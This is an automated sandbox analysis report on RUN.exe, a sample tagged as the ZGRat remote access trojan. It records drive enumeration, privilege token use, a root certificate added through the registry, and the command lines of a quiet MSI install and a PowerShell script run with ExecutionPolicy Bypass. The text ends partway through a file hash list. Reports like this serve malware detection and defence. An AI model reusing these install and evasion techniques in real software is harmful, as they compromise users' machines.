Malware Analysis Report

2024-10-23 21:45

Sample ID 240318-r3a6qabc38
Target RUN.exe
SHA256 148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
Tags
zgrat evasion rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010

Threat Level: Known bad

The file RUN.exe was found to be: Known bad.

Malicious Activity Summary

zgrat evasion rat trojan

Detect ZGRat V1

Modifies security service

ZGRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies Windows Defender Real-time Protection settings

Stops running service(s)

Drops file in Drivers directory

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Modifies data under HKEY_USERS

Modifies system certificate store

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-18 14:42

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-18 14:42

Reported

2024-03-18 14:49

Platform

win7-20240221-en

Max time kernel

119s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIC8B3.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76c19a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76c19a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC5A4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC68F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC77A.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1460 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe
PID 1460 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe
PID 1460 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe
PID 1460 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe
PID 1460 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe
PID 1460 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe
PID 1460 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe
PID 2008 wrote to memory of 1696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1836 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1836 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1836 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1836 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1836 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1836 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1836 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 2008 wrote to memory of 1916 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1916 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1916 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1916 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1916 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1916 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2008 wrote to memory of 1916 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1916 wrote to memory of 2412 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 2412 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 2412 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 2412 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding ADC02774F451DC4E178ED0D9FC29DED4 C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710513625 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding DCC0632486B118856CBB3129BA962233

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssCA25.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiCA13.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrCA14.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrCA15.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

Network

Files

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS620D.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
